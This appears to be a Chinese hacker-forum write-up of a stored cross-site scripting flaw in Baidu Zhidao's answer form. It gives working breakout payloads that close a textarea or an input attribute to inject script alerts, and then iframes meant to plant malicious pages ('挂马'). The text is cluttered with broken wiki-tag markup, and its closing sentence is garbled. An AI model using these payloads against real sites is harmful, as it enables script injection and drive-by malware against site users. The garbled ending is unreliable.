[[wiki]wiki[/wiki]][/wiki]文章作者:lszm
[wiki]技术[/wiki]团队:鬼混客[wiki]信息[/wiki][wiki]安全[/wiki]小组([[wiki]URL[/wiki]=http://www.[wiki]hacker[/wiki].com.cn/newbbs/www.ghkcn.cn]
www.ghkcn.cn[/url]) & 西盟网安小组(
http://bbs.zmke.com)
以前写过二三次关于[wiki]百度[/wiki]XSS的文章,特别上次的baidu知道title标签的跨站,好似引起了好些人的关注,那篇文章我写得比较详细,对百度的各个脚落做了检测,本以为这些就完了,今天再去百度,竟在百度知道里再次发现XSS,而这个XSS竟似乎利用价值远远高过前几次发现的..
为什么说这次的利用价值高呢?就一点:这次的XSS不用构造任何URL..
具体这个漏洞是如何造成的呢,且看下文,听我详谈!
进入百度知道,这次我们回答问题!随便找一个问题吧,回答,当然你要先注册一个用户,直接在回答问题框输入我们的跨站检测代码"<>"当然最好再给前面也打几个意思意思的字,要不就会被百度当成AD直接T掉了,下面还有个网址引用的地方,直接也加上我们的[wiki]测试[/wiki]代码吧!如图:
提交后,查看我们回答的问题,再查看源文件,发现如下:
Copy code
><font color=#777777>关闭</font></a></td></tr></table>
<textarea name="co" cols="60" rows="10" style="margin-top:10px;">到处加群,加上N个,然后在群里面发广告,嘿,不过估计发不了几个就被T了!
<></textarea>
<br>回答字数10000字以内<br><br></td>
</tr>
<tr valign="top">
<td nowrap class="f14">参考资料:</td>
<td><input name="sn" [wiki]type[/wiki]="text" size="50" val[wiki]UE[/wiki]="
http://www.zmke.com<>">
我们输入的二处<>未做任何过滤及转换,仅仅是做了些简单的屏蔽,这很好突破!
再次回到我们回答问题的框框,当然你也可以修改刚才回答的问题,测试代码我们做出这样的处理:
</textarea><script>alert(/lszm QQ:9155658/)</script><textarea>这是内容那的代码,引用网址那我们做出如下构造: "><script>alert(/lszm QQ:9155658/)</script><" 原理还是让标签提前开始与提前结束的原理!
再次提交!
查看我们回答问题的贴子,出现如图所示:
测试一下,跨了二次,二次均完全突破限制!
试过了这个,我们试个挂马代码试试,同样的突破限制的方法,分别如此构造
</textarea><iframe src=http://zmke.com width=555 height=120></iframe><textarea">
"><iframe src=http://bbs.ghkcn.cn width=555 height=120></iframe><"
而后提交!
结果没见到任何效果,再点修改回答,出现如图:
挂马效果是出现了,但能修改这个回答的人只有你一个,似乎利用价值不大,而后我对源码做了好几碵wiki]胃[/wiki]慕峁黄剖О埽坪趺话旆恕D奈桓呤秩绻芄煌黄普獠闱牖馗鎏痈嫠呶遗叮伲
